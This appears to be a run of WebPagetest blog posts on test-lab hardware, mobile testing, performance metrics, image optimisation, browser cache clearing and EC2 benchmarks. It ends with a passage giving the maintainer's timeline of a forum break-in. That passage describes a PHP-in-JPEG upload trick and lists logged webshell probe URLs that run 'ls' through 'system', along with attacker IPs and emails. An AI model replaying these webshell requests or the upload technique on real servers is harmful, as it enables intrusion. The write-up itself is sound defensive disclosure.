It has been 3 years since the last tour and a lot of people have been asking if it is still hosted in my basement so it's time for an update.
First, yes it is still hosted out of my basement. I did move it out of the utility room and into a storage room so if the water heater leaks it will no longer take out everything.
Yes, Halloween has gotten a bit out of control.
This is what it looked like last year (in our garage though the video doesn't quite do it justice).
The WebPagetest "rack" is a gorilla shelf that holds everything except for the Android phones.
Starting at the bottom we have the 4 VM Servers that power most of the Dulles desktop testing. Each server is running VMWare ESXi (now known as VMWare Hypervisor) with ~8 Windows 7 VM's on each. I put the PC's together myself:
- Single socket Supermicro Motherboards with built-in IPMI (remote management)
- Xeon E3 processor (basically a Core i7)
- 32 GB Ram
- Single SSD Drive for VM Storage
- USB Thumb drive (on motherboard) for ESXi hypervisor
The SSDs for the VM storage lets me run all of the VM's off of a single drive with no I/O contention because of the insane IOPS you can get from them (I tend to use Samsung 840 Pro's but really looking forward to the 850's).
As far as scaling the servers goes, I load up more VM's than I expect to use, submit a whole lot of tests with all of the options enabled and watch the hypervisor's utilization. I shut down VM's until the CPU utilization stays below 80% (one per CPU thread seems to be the sweet spot).
Moving up the rack we have the
unraid NAS where the tests are archived for long-term storage (as of this post the array can hold 49TB of data with 18TB used for test results). I have a bunch of other things on the array so not all of that 30TB is free but I expect to be able to continue storing results indefinitely for the foreseeable future.
I haven't lost any data (though drives have come and gone) but the main reason I like unraid is if I lose multiple drives it is not completely catastrophic and the data on the remaining drives can still be recovered. It's also great for power because you can have it automatically spin down the drives that aren't being actively accessed.
Next to the unraid array is the stack of Thinkpad T430's that power the "Dulles Thinkpad" test location. They are great if you want to test on relatively high-end physical hardware with GPU rendering. I really like them for test machines because they also have built-in remote management (AMT/vPro in Intel speak) so I can reboot or remotely fix them if anything goes wrong. I have all of the batteries pulled out so they don't kill them with recharge cycles but if you want built-in battery backup/UPS they work great for that too.
Buried in the corner next to the stack of Thinkpads is the web server that runs
www.webpagetest.org.
The hardware mostly matches the VM servers (same motherboard, CPU and memory) but the drive configuration is different. There are 2 SSD's in a RAID 1 array that run the main OS, Web Server and UI and 2 magnetic disks in a RAID 1 array that is used for short-term test archiving (1-7 days) before they are moved off to the NAS. The switch sitting on top of the web server connects the Thinkpads to the main switch (ran out of ports on the main switch).
The top shelf holds the main networking gear and some of the mobile testing infrastructure.
The iPhones are kept in the basement with the rest of the gear and connect WiFi to an Apple Airport Express. The Apple access points tend to be the most reliable and I haven't had to touch them in years. The access point is connected to a network bridge so that all of the Phone traffic goes through the bridge for traffic shaping. The bridge is running Free BSD 9.2 which works really well for dummynet and has a fixed profile set up (for now) so that everything going through it sees a 3G connection (though traffic to the web server is configured to bypass the shaping so the test results are fast to upload). The bridge is running a supermicro 1U atom server which is super-low power, has remote management and is more than fast enough for routing packets.
There are 2 iPhones running tests for the
mobile HTTP Archive and 2 running tests for the Dulles iPhone testing for WebPagetest. The empty bracket is for the third phone that is usually running tests for Dulles as well but I'm using it for dev work to update the agents to move from
mobitest to the new
nodejs agent code.
The networking infrastructure is right next to the mobile agents.
The main switch has 2 VLANs on it. One connects directly to the public Internet (the right 4 ports) and the other (all of the other ports) to an internal network. Below the switch is the router that bridges the two networks and NATs all of the test agent traffic (and runs as a DHCP and DNS server). The WebPagetest web server and the router are both connected to the public Internet directly which ended up being handy when the router had software issues and I was in Alaska (I could tunnel through the web server to the management interface on the router to bring it back up). The router is actually the bottom unit and a spare server is on top of it, both are the same 1U atom servers as the traffic-shaping bridge though the router runs Linux.
My Internet connection is awesome (at least by US pre-Google Fiber standards). I am lucky enough to live in an area that has Verizon FIOS (Fiber). I upgraded to a business account (not much more than a residential one) to get the static IP's and I get much better support, 75Mbps down/35Mbps up and super-low latency. The FIOS connection itself hasn't been down at all in at least the last 3 years.
The Android devices are on the main level of the house right now on a shelf in the study, mostly so I don't have to go downstairs in case the devices need a bit of manual intervention (and while we shake out any reliability issues in the new agent code).
The phones are connected through an
Anker usb hub to and Intel NUC running Windows 7 where the nodejs agent code runs to manage the testing. The current-generation NUC's don't support remote management so I'm really looking forward to the next release (January or so) that are supposed to add it back. For now I'm just using VNC on the system which gives me enough control to reboot the system or any of the phones if necessary.
The phones are all connected over WiFi to the Access point in the basement (which is directly below them). The actual testing is done over the traffic-shaped WiFi connection but all of the phone management and test processing is done on the tethered NUC system. I tried Linux on it but at the time the USB 3 drivers were just too buggy so it is running Windows (for now). The old android agent is not connected to the NUC and is running mobitest but the other 10 phones are all connected to the same host. I tried connecting an 11th but Windows complained that too many USB device ID's were being used so it looks like the limit (at least for my config) is 10 phones per host. I have another NUC ready to go for when I add more phones.
One of the Nexus 7's is locked in portrait mode and the other is allowed to rotate (which in the stand means landscape). All of the rest of the phones are locked in portrait. I use
these stands to hold the phones and have been really happy with them (and have a few spares off to the left of the picture).
At this point the android agents are very stable. They can run for weeks at a time without supervision and when I do need to do something it's usually a matter of remotely rebooting one of the phones (and then it comes right back up). After we add a little more logic to the nodejs agent to do the rebooting itself they should become completely hands-free.
Unlike the desktop testing, the phone screens are on and visible while tests are running so every now and then I worry that the kids may walk in while someone is testing a NSFW site but they don't really go in there (something to be aware of when you set up mobile testing though).
One question I get asked a lot is why I don't host it all in a data center somewhere (or run a bunch of it in the cloud). Maybe I'm old-school but I like having the hardware close by in case I need to do something that requires physical access and the costs are WAY cheaper that if I was to host it somewhere else. The increased power bill is very slight (10's of dollars a month), I'd have an Internet connection anyway so the incremental cost for the business line is also 10's of dollars per month and the server and storage costs were one-time costs that were less than even a couple of months of hosting. Yes, I need to replace drives from time to time but at $150 per 4TB drive, that's still a LOT cheaper than storing 20TB of data in the cloud (not to mention the benefit of having it all on the same network).
We've been working to bring better support for measuring web performance on mobile for a while. Michael Klepikov started out by building out a new cross-platform test agent for WebPagetest that runs on Node.js, can run WebDriver/Selenium scripts and can talk to the Dev Tools interface for Chrome. Todd Wright extended that support to talk to mobile Chrome on android and even Safari on iOS using a Dev Tools proxy that he created. Browser support has been really good for a while and we could get great request data and full timelines but video has always been the blocker for being able to launch. When Android 4.4 launched with the ability to record 60FPS video on-device with very low overhead it solved the last issue that was holding us back from launching.
WebPageTest now supports Chrome stable and Beta on Android 4.4
For
private instances the code is all in
github and once it has had a couple of weeks of public use and shaking through any issues I'll cut an official release. If you want to try it out before then you'll need both the web and agent code to support the new video capture capabilities (agent setup instructions are
here).
Live on the public instance are a collection of devices in the Dulles location for testing:
There are:
- 5 Motorola G's
- 2 Nexus 5's
- 1 Nexus 7 in Portrait Mode
- 1 Nexus 7 in Landscape Mode
To select the devices, just select the Dulles location from the location list and they will show up in the list of browsers.
All of the devices are also available through the API for automated testing with the location ID's available
here.
For now all of the devices are using a fixed 3G connection profile but hopefully soon they will have support for arbitrary connection profiles as well.
The video capture on the mobile devices is significantly better than what we have on Desktop and I highly encourage you to try it out. Most of the sites I have tried out take a surprisingly long time to display anything (
one second is a good, aggressive target to shoot for). Since the mobile devices support much faster capture than desktop, the filmstrip view in WebPageTest has a
new 60FPS option for displaying every frame and being able to see EXACTLY when something was displayed.
The increased resolution really helps when aligning the video with what is happening in the waterfall.
We also get full
dev tools timeline views of what is going on which is particularly important on mobile given the slower processing (timelines are captured automatically when video is enabled or optionally in the "Chrome" tab of the advanced settings otherwise).
If you're really adventurous you can also submit
WebDriver/Selenium scripts for testing (though it hasn't had a lot of exercise so there may be issues).
Most of the test features that you are used to using on desktop still don't work but over the next few weeks we should be able to fill some of them in as well as add some more mobile-specific capabilities:
- Packet Captures (tcpdump)
- Arbitrary connection profiles
- Testing with Chrome's Data Reduction Proxy enabled
- Arbitrary Chrome command-line switches (will allow for DNS rewriting and cert ignoring)
- Test sharding so individual tests can run in parallel across devices and complete faster
- Storing of response bodies
- Javascript disabling
- SPOF testing
- Basic WPT scripting support (logData, navigate and exec commands initially)
Take the devices for a spin and
let us know if you see any issues. If you don't see the devices online it's possible that the agent threw an exception that we didn't handle and I should be able to bring them back online pretty quickly (
ping me if it looks like they've been offline for a while).
TL;DR: WebPagetest will now expose any User Timing marks that a page records so you can use the same custom events for your synthetic test measurement as well as your Real User Measurement (and you can use WebPagetest to validate your RUM measurement points).
Before kicking off an optimization effort it is important to have good measurements in place. If you haven't already read Steve Souders' blog post on Moving beyond window.onload(), stop now, go read it and come back.
The Page Load time (start of navigation to the onload event) is the cornerstone metric for most web performance measurement and it is a fundamentally broken measurement that can end up doing even more harm than good by getting developers to focus on the wrong thing. Take two examples of static pages from WebPagetest for example:
The first is the main test results page that you see after running a test. Fundamentally it consists of the data table and several thumbnail images (waterfalls and screen shots). There are a bunch of other things that make up the page but they aren't the critical parts of the page for the user. Specifically, Ads, social buttons (twitter and g+), the partner logos at the bottom of the page, etc.
Here is what it looks like when it loads:
The parts of the page that the user (and I) care about have completely finished loading in 500ms but the reported page load time is 3 seconds. If I was going to optimize for the page load time I would probably remove the ads, the social widgets, the partner logos and the analytics. The reported onload time would be better but the actual performance for the user experience would not change at all so it would be completely throw-away work (not to mention detrimental to the site itself).
The second is the domains breakdown page which uses the Google visualization libraries to draw pie charts of the bytes and requests by serving domain:
In this case the pie charts actually load after the onload event and measuring the page load time is really just measuring a blank white page.
If you were to compare the load times of both pages using the traditional metrics they would appear to perform about the same but the page with the pie charts has a significantly worse user experience.
This isn't really new information, the work I have been doing on the
Speed Index has largely been about providing a neutral way to measure the actual experience and to do it consistently across sites. However, if you own the site you are measuring, you can do a LOT better since you know the parts of the page
Instrumenting your pages
There are a bunch of Real User Measurement libraries and services available (Google Analytics, SOASTA mPulse, Torbit Insight, Boomerang, Episodes) and most monitoring services also have real-user beacons available as part of their offerings. Out of the box they will usually record the onload time but they usually also have options for custom measurements. Unfortunately they all have their own APIs right now but there is a W3C standard that the performance group nailed down last year for
User Timing. It is a very simple API that lets you record point-in-time measurements or events and provides a way to query and clear the list of events. Hopefully everyone will move to leveraging the user timing interfaces and provide a standard way for marking "interesting" events but it's easy enough to build a bridge that takes the user timing events and reports them to whatever you are using for your Real User Measurement (RUM).
As part of working on this for WebPagetest itself I threw together a
shim that takes the user timing events and reports them as custom events to Google Analytics and SOASTA's mPulse or Boomerang. If you throw it at the end of your page or load it asynchronously, it will report aggregated user timing events automatically. The "aggregated" part is key because when you are instrumenting a page you can identify when individual elements load but what you really care about is when they have ALL loaded (or all of a particular class of events have happened). The snippet will report the time of the last event that fired and it will also take any period-separated names (group.event) and report the last time for each group. In the case of WebPagetest's result page I have "aft.Header Finished", "aft.First Waterfall" and "aft.Screen Shot" (aft being short for above-the-fold". The library will record an aggregate "aft" time that is the point when everything that I consider critical as above-the-fold has loaded.
The results paint a VERY different view of performance than you get from just looking at the onload time and match the filmstrip much better. Here is what the performance of all visitors from the US to the test results page looks like in mPulse.
Page Load (onload):
aft (above-the-fold):
That's a pretty radical difference, particularly in the long-tail. A 13 second 98th percentile is something that I might have freaked out about but 4 seconds is quite a bit more reasonable and actually better represents the user experience.
One of the cool things about the user timing spec is that the interface is REALLY easy to polyfill so you can use it across all browsers. I threw together a quick
polyfill (feel free to improve on it - it's really basic) as well as a wrapper that makes it easier to do the actual instrumentation.
Instrumenting your page with the helper is basically just a matter of throwing calls to markUserTime() at points of interest on the page. You can do it with inline script for text blocks:
or more interestingly, as onload handlers for images to record when they loaded:
If you can get away with just using image onload handlers that would be the safest bet because inline scripts can have unintended blocking events where the browser has to wait for previous css files to load and process before executing. It's probably not an issue for an inline script block well into the body of a bage but something to be aware of.
Bringing some RUM to synthetic testing
Now that you have gone and instrumented your page so that you have good, actionable metrics from your users, it would be great if you could get the same data from your synthetic testing. The latest
WebPagetest release will extract the user timing marks from pages being tested and expose them as additional metrics:
At a top-level, there is a new "User Time" metric that reports the latest of all of the user timing marks on the page (this example is from the breakdown pie chart page above where the pie chart shows up just after 3 seconds and after the load event). All of the individual marks are also exposed and they are drawn on the waterfall as vertical purple lines. If you hover over the marker at the top of the lines you can also see details about the mark.
The times are also exposed in the XML and JSON interfaces so you can extract them as part of automated testing (the XML version has the event names normalized):
This works as both a great way to expose custom metrics for your synthetic testing as well as for debugging your RUM measurements to make sure your instrumentation is working as expected (comparing the marks with the filmstrip for example).
TL;DR: Progressive JPEGs are one of the easiest improvements you can make to the user experience and the penetration is a shockingly-low 7%. WebPagetest now warns you for any JPEGs that are not progressive and provides some tools to get a lot more visibility into the image bytes you are serving.
I was a bit surprised when Ann Robson measured the penetration of progressive JPEGs at 7% in her 2012 Performance Calendar article. Instead of a 1,000 image sample, I crawled all 7 million JPEG images that were served by the top 300k websites in the May 1st HTTP Archive crawl and came out with....wait for it.... still only 7% (I have a lot of other cool stats from that image crawl to share but that will be in a later post).
Is The User Experience Measurably Better?
Before setting out and recommending that everyone serve progressive JPEGs I wanted to get some hard numbers on how much of an impact it would have on the user experience. I put together a pretty simple transparent proxy that could serve arbitrary pages, caching resources locally and transcoding images for various different optimizations. Depending on the request headers it would:
- Serve the unmodified original image (but from cache so the results can be compared).
- Serve a baseline-optimized version of the original image (jpegtran -optimize -copy none).
- Serve a progressive optimized version (jpegtran -progressive -optimize -copy none).
- Serve a truncated version of the progressive image where only the first 1/2 of the scan lines are returned (more on this later).
I then ran a suite of the Alexa top 2,000 e-commerce pages through WebPagetest comparing all of the different modes on a 5Mbps Cable and 1.5Mbps DSL connection. I first did a warm-up pass to populate the proxy caches and then each permutation was run 5 times to reduce variability.
The full test results are available as Google docs spreadsheets for the
DSL and
Cable tests. I encourage you to look through the raw results and if you click on the different tabs you can get links for filmstrip comparisons for all of the URLs tested (like
this one).
Since we are serving the same bytes, just changing HOW they are delivered, the full time to load the page won't change (assuming an optimized baseline image as a comparison point). Looking at the Speed Index, we saw median improvements of 7% on Cable and 15% on DSL. That's a pretty huge jump for a fairly simple serving optimization (and since the exact same pixels get served there should be no question about quality changes or anything else).
Here is what it actually looks like:
Some people may be concerned about the extremely fuzzy first-pass in the progressive case. This test was just done with using the default jpegtran scans. I have a TODO to experiment with different configurations to deliver more bits in the first scan and skip the extremely fuzzy passes. By the time you get to 1/2 of the passes, most images are almost indistinguishable from the final image so there is a lot of room for improving the experience.
What this means in WebPagetest
Starting today, WebPagetest will be checking every JPEG that is loaded to see if it is progressive and it will be exposing an overall grade for progressive JPEGs:
The grade weights the images by their size so larger images will have more of an influence. Clicking on the grade will bring you to a list of the images that were not served progressively as well as their sizes.
Another somewhat hidden feature that will now give you a lot more information about the images is the "View All Images" link right
below the waterfall:
It has been beefed up and
now displays optimization information for all of the JPEGs, including how much smaller it would be when optimized and compressed at quality level 85, if it was progressive and the number of scans if it was:
The "
Analyze JPEG" link takes you to a view where it shows you optimized versions of the image as well as dumps all of the meta-data in the image so you can see what else is included.
What's next?
With more advanced scheduling capabilities coming in HTTP 2.0 (and already here with SPDY), sites can be even smarter about delivering the image bits and re-prioritize progressive images after enough data has been sent to render a "good" image and deliver the rest of the image after other images on the page have had a chance to display as well. That's a pretty advanced optimization but it will only be possible if the images are progressive to start with (and the 7% number does not look good).
Most image optimization pipelines right now are not generating progressive JPEGs (and aren't stripping out the meta-data because of copyright concerns) so there is still quite a bit we can do there (and that's an area I'll be focusing on).
Progressive JPEGs can be built with almost arbitrary control over the separate scans. The first scan in the default libjpeg/jpegtran setting is extremely blocky and I think we can find a much better balance.
At the end of the day, I'd love to see CDNs automatically apply lossless image optimizations and progressive encoding for their customers while maintaining copyright information. A lot of optimization services already do this and more but since the resulting images are identical to what came from the origin site I'm hoping we can do better and make it more automatic (with an opt-out for the few cases where someone NEEDS to serve the exact bits).
I have the pleasure of helping select the talks for a couple of the Velocity conferences this year and after looking at several hundred proposals it is clear that there are widely varying opinions from submitters on what would make for a good talk and also a lot of cases where the topics may be good but the submitter may have the wrong focus. I'm certainly not an expert on the topic but I think that if you just keep one point in mind when submitting a talk for a tech conference (any tech conference) your odds of getting a talk accepted will go up exponentially:
It is all about the attendees! Period!
When you're submitting a talk, try to frame it in such a way that each attendee will get enough value out of your talk to justify the expense of them attending the conference (conference costs, travel, opportunity cost, etc). If all of the talks meet that criteria then you end up with a really awesome conference.
If you are talking about a technique or toolchain, make sure that attendees will be able to go back to their daily lives and implement what you talked about. More often than not that means the tools need to be readily available (bonus points for open source) and you need to provide enough information that what you did can be replicated. These kinds of talks are also a lot better if they are presented by the team that implemented the "thing" and not by the vendor providing the toolchain. For most tech conferences, the attendees are hands-on so hearing from the actual dev/ops teams that did the work is optimal.
Make sure you understand the target audience as well and make the talks generally applicable. For something like Velocity where the attendees are largely web dev/ops with a focus on scaling and performance, make sure your talk is broadly applicable to them. A talk on implementing low-level networking stacks will not work as well as a talk about how networking stack decisions and tuning impact higher-level applications for example.
What doesn't work?
- Product pitches (there are usually sponsored tracks and exhibit halls for that kind of thing)
- PR. This is not about getting you exposure, it is about educating the attendees.
My favorite web performance article in 2012 was this one from Kyle Rush about the work done on the Obama campaign's site during the 2012 election cycle. They did do some cool things but it wasn't the technical achievements that got my attention, it was the effort that they put into it. They re-architected the platform to serve as efficiently as possible by serving directly from the edge and ran 240 A/B tests to evolve the site from it's initial look and feel to the final result at the end of the campaign (with a huge impact on the donations as a result of both efforts).
Contrasted to the Romney tech team that appears to have contracted a lot of the development out and spent quite a bit more to do it (wish there was an easy way to compare the impact on the funds raised but the donation patterns across the parties is normally very different).
What I like most is that it demonstrates very clearly how having someone's motivations aligned with the "business" goals is absolutely critical and those are the situations where you usually see the innovative work and larger efforts put in. I see this time and time again in the tech industry and I'm sure it applies elsewhere but it is absolutely critical to be aware of in tech.
Fundamentally that is what DevOps is all about and why the classical waterfall development model is broken:
- Business identifies a "product need"
- Product team specs-out a product to fill that need
- Dev team builds what was specified by the product team (usually as exactly to the requirements as possible, including fussing about pixel-perfect matching the mock-up designs)
- Dev team throws the resulting product over the wall to QA to test and verify against the requirements
- QA team throws the final product over the wall to the Ops team to run
- Usually forever and long after the dev and product teams have moved on
- Usually doing all sorts of crazy things to keep the system running (automatic restarts, etc)
By bringing the various teams together and making them have skin in the game they are incented to produce a product that is easier to implement, scales and runs reliably (getting developers on pager duty is easily the fastest way to get server code and architectures fixed).
As you look across your deployment, small site or large, what are the motivating factors for each of the teams responsible for a given component?
The Hosting
If you are not running your own servers then there is a good chance that the company that is running them isn't incentivised to optimize for your needs.
In the case of shared hosting, the hosting provider makes their money by running as many customers on as little hardware as possible. Their goal is to find the edge at which point people start quitting because things perform so badly and make sure they stay as close to that as possible without going beyond it. When I see back-end performance issues with sites, they are almost always on shared hosting and at times it can be absolutely abysmal.
With VPS or dedicated hosting they usually get more money as you need more compute resources. Their incentive is to spend as little time as possible supporting you and certainly not to spend time tuning the server to make it as fast as possible.
If you are running on someone else's infrastructure (which includes the various cloud services so it is increasingly likely that you are), I HIGHLY recommend that you have the in-house skills necessary to tune and manage the servers and serving platforms. You need remote hands-and-eyes to deal with things like hardware failures, but outsourcing the management will hardly ever be a good idea. Having someone on your team who is incented to get as much out of the platform as possible will save you a ton of money in the long term and result in a much better system.
Site Development
You should have the skills and teams in-house to build your sites. Period. If you contract the work out then the company you work with is usually working to do as little work as possible to deliver exactly what you asked for in the requirements document. Yes, they will probably work with you a bit to make sure it makes sense but they are not motivated by how successful the resulting product will be for your business - once they get paid they are on to the next contract.
I see it all too often. Someone will be looking at the performance of their site and there are huge issues, even with some of the basics but they can't fix it. They contracted the site out and what they were delivered "looks" like what they were asked to deliver and functions perfectly well but architecturally it is a mess.
There are great tools available to help you tune your sites (front and back-end) but you need to have the skills in-house to do it. Just like with the Obama campaign, they focused on continuously optimizing the site for the duration of the campaign because they were a part of the team and were motivated by the ultimate business goals, not by some requirements document that they needed to check all of the boxes to.
Maybe I'm a bit biased since I'm a software guy who also likes to do the end-to-end architectures and system tuning but I absolutely believe that these are skills you need to have or develop as part of your actual team in order to be successful. Contracting out for expertise also makes sense as long as they are educating your team as you go along and it's more about the education and getting you on the right track.
CDNs
Maybe it's my tinfoil hat getting a bit tight, but given that CDNs usually bill you for the number of bits they serve on your behalf, it doesn't feel like they are particularly motivated to make sure you are only serving as many bits as you need to. Things like always gzipping content where appropriate is one of the biggest surprises. It seems like a no-brainer but most CDN's will just pass-through whatever your server responds with and won't do the simple optimization of gzipping as much as possible (most of them have it as an available setting but it is not enabled by default).
Certainly you don't want to be building your own CDN but you should be paying very careful attention to the configuration or your CDN(s) to make sure the content they are serving is optimized for your needs.
Motivations/Incentives
Finally, just because you have the resources in-house doesn't mean that their motivations are aligned with the business. In the classic waterfall example, the dev teams are not normally motivated to make sure the systems they build are easy to operate (resilient, self-healing, etc). In a really small company where the tech people are also founders then it is pretty much a given that their incentives are very well aligned but as your company gets larger it becomes a lot harder to maintain that alignment. Product dogfooding, DevOps and Equity sharing are all common techniques to try to keep the alignment which is why you see all of those so often in the technical space.
OK, time to put away the soapbox - I'd love to hear how other people feel about this, particularly counter arguments where it does make sense to completely hand-off responsibility to a third-party.
I've spent the last week or so getting the IE testing in WebPagetest up to snuff for IE 10. I didn't want to launch the testing until everything was complete because there were some issues that impacted the overall timings and I didn't want people to start drawing conclusions about browser comparisons until the data was actually accurate.
The good news is that all of the kinks have been ironed out and I will be bringing up some Windows 8 + IE 10 VM's over the Thanksgiving holidays (have some new hardware on the way because the current servers are running at capacity).
In the hopes that it helps other people doing browser testing I wanted to document the hoops that WebPagetest goes through to ensure that "First View" (uncached) tests are as accurate as possible.
Clearing The Caches
It's pretty obvious, but the first thing you need to make sure you are doing when you are going to do first view tests is to clear the browser caches. In the good old days this pretty much just meant the history, cookies and object caches but browsers have evolved a lot over the years and they store all sorts of other data and heuristic information that helps them load pages faster and to properly test first view page loads you need to nuke all of them.
For Chrome, Firefox and Safari it is actually pretty easy to clear out all of the data. You can just delete the contents of the profile directory which is where each browser stores all of the per-user data and you essentially get a clean slate. There are a few shared caches that you also want to make sure to clear out:
DNS Cache - WebPagetest clears this by calling DnsFlushResolverCache in dnsapi.dll and falling back to running "ipconfig /flushdns" from a shell.
Flash Storage - Delete the "\Macromedia\Flash Player\#SharedObjects" directory
Silverlight Storage - Delete the "\Microsoft\Silverlight" directory
That will be enough to get the non-IE browsers into a clean state but IE is a little more difficult since it is pretty tightly interwoven into the OS as we
learned a few years back.
The first one to be aware of is the OS certificate store. Up until a few months ago WebPagetest wasn't clearing that out and it was causing the HTTPS negotiations to be faster than they would be in a truly first view scenario. On Windows 7, all versions of IE will do CRL and/or OCSP validation of certificates used for SSL/TLS negotiation. That validation can be EXTREMELY expensive ( several round trips for each validation) and the results were being cached in the OS certificate store. This made the HTTPS performance in IE appear faster than it really was for true first view situations.
To clear the OS certificate stores we run a pair of commands:
certutil.exe -urlcache * delete
certutil.exe -setreg chain\\ChainCacheResyncFiletime @now
IE 10 introduced another cache where it keeps track of the different domains that a given page references so it can pre-resolve and pre-connect to them (Chrome has similar logic but it gets cleared when you nuke the profile directory). No matter how you clear the browser caches (even through the UI), the heuristic information persists and the browser would pre-connect for resources on a first view.
When I was testing out the IE 10 implementation the very first run of a given URL would look as you would expect (ignore the really long DNS times - that's just an artifact of my dev VM):
But EVERY subsequent test for the same URL, even across manual cache clears, system reboots, etc would look like this:
That's all well and good (great actually) for web performance but a bit unfortunate if you are trying to test the uncached experience because DNS, socket connect (and I assume SSL/TLS negotiation) is basically free and removed from the equation. It's also really unfortunate if you are comparing browsers and you're not clearing it out because it will be providing an advantage to IE (unless you are also maintaining the heuristic caches in the other browsers).
Clearing out this cache is what has been delaying the IE 10 deployment on WebPagetest and I'm happy to say that I finally have it under control. The data is being stored in a couple of files under "\Microsoft\Windows\WebCache". It would be great if we could just delete the files but they are kept persistently locked by some shared COM service that IE leverages.
My current solution to this is to terminate the processes that host the COM service (dllhost.exe and taskhostex.exe) and then delete the files. If you are doing it manually then you also need to suspend the parent process or stop the COM+ service before terminating the processes because they will re-spawn almost immediately. If anyone has a better way to do it I'd love feedback (the files are mapped into memory so NtDeleteFile doesn't work either).
Browser Initialization
Once you have everything in a pristine state with completely cleared profiles and caches you still have a bit more work to do because you want to test the browser's "first view" performance, not "first run" performance. Each of the browsers will do some initialization work to set up their caches for the first time and you want to make sure that doesn't impact your page performance testing.
Some of the initialization happens on first access, not browser start up so you can't just launch the browser and assume that everything is finished. WebPagetest used to start out with about:blank and then navigate to the page being tested but we found that some browsers would pay a penalty for initializing their caches when they parsed the first HTML that came in and they would block. I believe Sam Saffron was the first to point out the issue when Chrome was not fetching sub-resources as early as it should be (on a page where the head was being flushed out early). In the case of the IE connection heuristics it would also pay a particularly expensive penalty at the start of the page load when it realized that I had trashed the cache.
In order to warm up the various browser engines and make sure that everything is initialized before a page gets tested WebPagetest navigates to a custom blank HTML page at startup. In the WebPagetest case that page is served from a local server on the test machine but it is also up on webpagetest.org:
http://www.webpagetest.org/blank.html if you want to see what it does. It's a pretty empty html page that has a style and a script block just to make sure everything is warmed up.
Wrap-up
Hopefully this information will be helpful to others who are doing browser performance testing.
You should also be careful taking browser-browser comparisons as gospel. As you can see, there are a lot of things you need to do to get to an apples-to-apples comparison and even then it isn't necessarily what users experience. Browsers are adding more heuristics, pre-connecting and even pre-rendering of pages into the mix and most of the work in getting to a clean "first view" defeats a lot of those techniques.
EC2 Performance
31 May 2012 7:06 AM (12 years ago)
WebPagetest makes EC2 AMI's available for people to use for running private instances and makes fairly extensive use of them for running the testing for the Page Speed Service comparisons. We have tested that the m1.small instances produce consistent results but we aren't necessarily sure if they are representative of real end-user machines so I decided to do some testing and see.
This is a very specific test that is just looking to compare the raw CPU performance for web browsing (single threaded) of various EC2 instance sizes against physical machines. It is not meant to be a browser comparison or a statement about EC2 performance beyond this very-specific use case.
Testing Methodology
I ran the SunSpider 0.9.1 benchmark 5 times on each of the different machines using Chrome 19 (it is important to keep the browser and version consistent since changes to the JavaScript engine will affect the results).
Results
As you can see, the m1.small instances are significantly slower than desktop systems from the last 5 years or so but it is somewhat faster than more recent low-end laptops. Netbooks and tablets are significantly slower still with times typically in the 1000+ range.
Conclusion
Unfortunately there isn't a clear-cut answer of what you should use to test if you are trying to test on a "representative" system because both the smaller and larger instances are representative of different ends of the computing spectrum.
My general feeling is that websites should not be CPU constrained and if they are then things will look exponentially worse on the tablets, chrome books and other cheap devices that are starting to flood the market. If you test using the larger instances then you will be testing on systems more representative of desktops which might be a good thing to do if that is specifically what you are targeting. The small instances are more likely to expose CPU constraints that will crop up in your user base (much like
Twitter noticed).
Call for Help
The systems I tested were machines that I had easy access to but are probably not representative of a lot of systems people have at home. If you could run
SunSpider using Chrome 19 on any systems you have lying around and share the results as well as the system specs in the comments below I'll update the chart and see if we can build a more representative picture.
*update - chart has been updated with the user-submitted results, thank you
It has been an exciting 2 days. Yesterday I discovered that over the weekend the forums at webpagetest.org had been hacked and that someone had installed a back door. I traced the source of the entry pretty quickly and locked out the exploit he had used but I wanted to make sure he hadn't done anything more damaging while he was there so I spent the last day pouring over the access logs to trace back his activities.
The hack involved uploading a custom image file that was both a valid jpeg and had php code inside of it that the php interpreter would execute and then tricking the server into executing the image as if it were php. I have the actual image as well as the command and control php he installed if anyone is interested (and by anyone I mean anyone I know who will do good things with it).
I thought it would be valuable to share (and somewhat entertaining) what I gleaned from the logs so here is the timeline of activities that I managed to piece together (all times are GMT):
March 23, 2012
- Registered for account in the WebPagetest forums and uploaded executable profile pic
- http://www.webpagetest.org/forums/member.php?action=profile&uid=27069
- used (presumably throw-away) yahoo mail account: science_media017@yahoo.com
- from 49.248.26.133 (also logged in to the account from 178.239.51.81 but there has been no recent activity from that IP)
March 30, 2012
109.123.117.122 (probably automated bot/process)
08:48 - Back door is installed and first accessed (install method is highlighted later). Hidden IFrame is added to the forums page.
Periodically - main page is loaded (presumably to check the status of the IFrame)
49.248.26.133 (appears to be manual activity)
08:58 - Loads the main page (presumably checking the IFrame)
April 1, 2012
109.123.117.122
08:49 - Installs adobe.jar (unfortunately I deleted it and didn't keep a copy for analysis), presumably for distribution or more access (no Java on the server though so not much point)
49.248.26.133
09:16 - Accessed the installed adobe.jar (presumably testing to make sure it installed)
April 2, 2012
me
~14:00 - Observed unexpected requests loading and found the IFrame (and quickly deleted it)
17:58 - Tracked down the location of the code that was used to install the IFrame (and unfortunately deleted it in my panic)
18:16 - Secured the hole that was used to execute php in the uploads directory
April 3, 2012
49.248.26.133
05:54 - Checked the main page for the iframe
06:02 - attempted to access gs.php (the back door php code)
69.22.185.30 (manual debugging/activity)
06:03 - Started probing to see what broke - attempted to access:
/forums/uploads/avatars/system1.php
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php?c=ls
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php
/forums/uploads/avatars/avatar_27069.jpg/.php
06:04 - Manually browser the forums, presumably checking to see if everything was down or just his hack and did some more probing:
/forums/images/on.gif
/forums/images/on.gif/.php to see if the php interpreter hole was still open (was at the time but he couldn't get any code placed there to execute - this has since been closed)
/forums/uploads/avatars/tileeeee.html (404 - already cleaned up)
06:05 - Tried the avatar hack again:
/forums/uploads/avatars/avatar_27069.jpg
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php?c=ls
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php
/forums/uploads/avatars/avatar_27069.jpg/.php
/forums/uploads/avatars/avatar_27069.jpg/
06:06 - Tries other avatar files to see if php hack is blocked on uploads
/forums/uploads/avatars/avatar_1.jpg/.php (yep - 403)
06:07 - Tries other back door commands he had installed:
/forums/uploads/avatars/sys.php
/forums/uploads/avatars/check.php
/forums/uploads/avatars/save.php
/forums/uploads/avatars/
06:10 - More frustration:
/forums/uploads/avatars/gs.php
/forums/uploads/avatars/system1.php
/forums/uploads/avatars/avatar_27069.jpg
/forums/uploads/avatars/avatar_27069.jpg/.php??1=system&2=ls
/forums/uploads/avatars/avatar_27069.jpg/.php
06:14 - Went through the registration UI and actually registered to the forum again
f309017@rppkn.com (throw-away)
